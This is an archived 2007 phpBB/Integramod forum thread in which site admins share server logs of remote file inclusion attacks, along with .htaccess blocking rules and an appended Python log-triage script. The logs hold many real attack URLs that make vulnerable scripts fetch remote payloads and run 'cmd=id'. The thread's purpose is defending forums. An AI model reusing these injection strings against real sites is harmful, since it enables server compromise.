Security Logs with Hacker IP's

This is where you'll find security-related information.
Discuss Integramod/phpbb security issues here.

Moderator: Integra Moderator

PostAuthor: Omni-Lee » Sat May 05, 2007 7:48 am

1 01 May 2007 03:59 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 83.144.149.196
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://www.abschleppdienst-viersen.de/templates/mp_ferro/images/freeman.txt? libwww-perl/5.803 81.169.149.189
3 30 Apr 2007 09:43 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.250.108
4 30 Apr 2007 02:33 pm /forum/profile.php?mode=http://www.alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 200.138.244.203
5 29 Apr 2007 11:18 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
6 29 Apr 2007 11:45 am /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
7 29 Apr 2007 11:45 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.18.93.107
8 29 Apr 2007 10:16 am /forum/profile.php?mode=http://www.zjkjw.gov.cn/tool25.txt?&cmd=id 200.181.152.9
9 29 Apr 2007 09:22 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.79.243
10 28 Apr 2007 10:29 pm /forum/profile.php?mode=http://www.Vel0zBR.xpg.com.br/Owner/cmd1.txt?&cmd=id 200.153.54.199
11 27 Apr 2007 06:23 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.2.78.239
12 26 Apr 2007 06:44 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 200.97.25.94
13 25 Apr 2007 11:19 pm /forum/profile.php?mode=http://br.geocities.com/ngrdownz/list.txt?&cmd=id 213.22.52.189
14 25 Apr 2007 11:10 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137
15 25 Apr 2007 07:49 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137

Note: Anytime I tried to add one of those addresses to agent blocker it would break the site. CrackTracker would throw a bunch of code lines at the top of the page.
"Out, out, brief candle! Life's but a walking shadow, a poor player that struts and frets his hour upon the stage and then is heard no more: it is a tale told by an idiot, full of sound and fury, signifying nothing" - Macbeth ACT V, Scene V by William Shakespeare

Re: Security Logs with Hacker IP's

PostAuthor: Omni-Lee » Thu May 10, 2007 4:30 pm

Thought I'd add a few more.

1 08 May 2007 07:16 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.67.182.247
2 08 May 2007 05:11 pm /forum/profile.php?mode=http://www.freewebs.com/dropcmd/tool25.dat?&cmd=id 189.13.156.90
3 08 May 2007 11:20 am /forum/profile.php?mode=http://dropcmd.netfast.org/tool25.txt?&cmd=id 201.9.15.12
4 08 May 2007 01:17 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 189.13.114.100
5 07 May 2007 11:54 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.9.96.227
6 06 May 2007 09:21 pm /forum/profile.php?mode=http://www.tools25.kit.net/tool25.dat?&cmd=id 201.8.90.148

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Tue Jul 03, 2007 9:10 pm

Have you run into this tool yet?

http://securityjobs.us/xpl/tembak.txt?

I think this one gets through but I'm not 100% sure.
I have 4 hits from it and the forum goes down to a .script kiddie pr message.

Re: Security Logs with Hacker IP's

PostAuthor: jomasaco » Fri Jul 13, 2007 12:03 pm

Good initiative Omni-Lee. I leave here my contribution.

201.50.228.87
04 Jul 2007 01:11 am /forum/IM141/profile.php?mode=http://www.butterbeidefische.de/DB59528/tool25.txt?&cmd=id
libwww-perl/5.69 217.110.144.106
13 Jul 2007 06:02 am /forum/postings_popup.php?t=69//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?
/forum/viewtopic.php?printertopic=1&t=9&start=0&postdays=0&postorder=asc&vote=viewresult//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?

PostAuthor: viragotech » Fri Jul 13, 2007 11:20 pm

I have been getting slammed with lots of similar stuff daily from about 10 different domains. Each day it's a whole new block of domains. But thank god none of them have worked, as they get caught and dumped as 403 errors.

Once I noticed, I did spend the first few days reporting sites and getting them shut down, but once I realized they change domains daily it doesn't make any sense and it's mucho work.

Though I have been editing my htaccess to block any traffic from said URLs ever again when they start the rotation of domains over at some point.

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Sun Jul 15, 2007 9:53 am

viragotech wrote:
"Though I have been editing my htaccess to block any traffic from said urls ever again when they start the rotation of domains over at some point."


I'm using the IPs, not the URLs. I know the IPs are proxies but I figure I've a better chance to block. (Although that .script didn't work, the prox did... so if I block the prox I may well stop a run with a .script that does work.)

As soon as I get an attempt I add the IP to the htaccess; this creates an update to my proxy ban list. Also I have started adding " # date " (rem statements); once the prox is dead it could be removed from the list and help keep the htaccess file size down, as I think the file gets processed on every hit.

Re: Security Logs with Hacker IP's

PostAuthor: jomasaco » Sun Jul 15, 2007 3:52 pm

one more.
/forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

Re: Security Logs with Hacker IP's

PostAuthor: Whisky » Fri Jul 20, 2007 6:45 am

I've got serious attacks (hopefully blocked) several times a day on my portal!


62.60.137.49
Fri 20 Jul 2007, 5


This proves that people complaining here about the insecurity of IM or the inutility of CrackerTracker are just idiots in my opinion
I am the Lizard King, I can do anything


Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Fri Jul 20, 2007 12:04 pm

yea my logs look like that too, for all the trouble setting up CT I got to say it was worth it.

Re: Security Logs with Hacker IP's

PostAuthor: jomasaco » Mon Jul 23, 2007 4:08 pm

still was not for this but should be barely... :P :P

These brutes do not have life, do not eat, do not drink, do not sleep, I have there xxx but I find that also do not want.

PostAuthor: viragotech » Wed Jul 25, 2007 12:21 pm

yep, I had to change domains and get a new host from all of that. I changed domains so they wouldn't just follow me to my new host, and had to get a new host from so many hack attempts I was over my traffic limits for CGI.

Buddy just lost 3 of his 141 IM forums today. They deleted everything. He dunno how they got root access but all is gone.

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Wed Jul 25, 2007 7:18 pm

Although I don't like doing this I have added this to my htaccess file. It's really cut back the number of runs on my forum.

jomasaco, I think you need to add it for sure!

RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]


So you need it to look like this in the htaccess file.

Code:
RewriteEngine On
# testing user agent blocking
# [OR] belongs only on a condition that is followed by another RewriteCond;
# it is left off here because this is the only (last) condition before the rule
RewriteCond %{HTTP_USER_AGENT} libwww-perl
# end test
RewriteRule ^.* - [F,L]


If the RewriteEngine is already on, just add the first line in the quote; if not, add the whole code to the file so it will process it.

Re: Security Logs with Hacker IP's

PostAuthor: Whisky » Thu Jul 26, 2007 4:25 am

Code:
RewriteEngine On
# testing user agent blocking
# [OR] left off: this is the last condition before the rule
RewriteCond %{HTTP_USER_AGENT} libwww-perl
# end test
RewriteRule ^.* - [F,L]



Definitely interesting, thank you

Re: Security Logs with Hacker IP's

PostAuthor: CaNNon » Fri Jul 27, 2007 8:16 pm

NP whisky, day 4 since i added that myself. On a side note it's been nice and quiet.

PostAuthor: Pflegen » Fri Aug 17, 2007 12:47 pm

When my IM site got hit a while back, I ended up blocking URL's with "/includes" or "/function*" in them.

Note: I also turned off allow_url_fopen in the php.ini

.htaccess or httpd.conf
===============

<Files>
Order allow,deny
Deny from all
</Files>

<Files>
Order allow,deny
Deny from all
</Files>



We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...

[Fri Aug 17 15:06:54 2007] [error] [client 203.32.125.78] client denied by server configuration: /websites/HG/html/includes/functions_portal.php


I like the URL Rewrite as well though. May consider that as a follow-up to catch the others that aren't using the include or function* paths.
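Added example, not code from any poster in this thread: a small log triage script for the request pattern the logs above share, a parameter whose value is a remote URL, which stays constant while the client IPs and hosting domains rotate. The sample lines, hosts and IPs are constructed, and the line layout is assumed from the log excerpts quoted in the thread.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Constructed sample lines (documentation-range IPs, example.* hosts) in the
# layout quoted in this thread: [n] date time URI [user agent] client-IP
SAMPLE_LOG = """\
1 01 May 2007 03:59 pm /forum/profile.php?mode=http://files.example.net/tool.dat?&cmd=id 192.0.2.10
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://host.example.org/a.txt? libwww-perl/5.803 198.51.100.7
3 01 May 2007 02:10 pm /forum/viewtopic.php?t=69&start=0 Mozilla/5.0 203.0.113.5
4 30 Apr 2007 09:43 pm /forum/profile.php?mode=http://files.example.net/tool.dat?&cmd=id 192.0.2.44
5 30 Apr 2007 08:00 pm /forum/profile.php?mode=http%3A%2F%2Fdrop.example.com%2Ftool.txt%3F&cmd=id 192.0.2.10
"""

LINE_RE = re.compile(
    r"^(?:\d+\s+)?(?P<when>\d{2} \w{3} \d{4} \d{2}:\d{2} [ap]m)\s+"
    r"(?P<uri>\S+)\s+(?:(?P<agent>.+?)\s+)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)
# A parameter whose value is itself a remote URL, anywhere in the query string
# (also catches the "//includes/x.php?param=http://..." form nested in a value).
PARAM_RE = re.compile(
    r"(?P<name>[A-Za-z0-9_\[\]]+)=(?P<url>(?:https?|ftp)://[^&\s]+)", re.IGNORECASE
)

def find_rfi_attempts(log_text):
    """Return one dict per log line whose query string carries a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the expected layout
        # Decode %XX first so http%3A%2F%2F... is seen as http://...
        _, _, query = unquote(m["uri"]).partition("?")
        p = PARAM_RE.search(query)
        if p:
            hits.append({"ip": m["ip"], "agent": m["agent"], "param": p["name"],
                         "payload_host": urlsplit(p["url"]).hostname})
    return hits

def summarize(hits):
    """Count hits per injected parameter, payload host and client IP."""
    return {k: Counter(h[k] for h in hits) for k in ("param", "payload_host", "ip")}

if __name__ == "__main__":
    for key, counts in summarize(find_rfi_attempts(SAMPLE_LOG)).items():
        print(key, dict(counts))
```

The per-parameter counts show which script parameters are being probed, which is the stable thing to filter on when the IP and domain lists keep changing.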
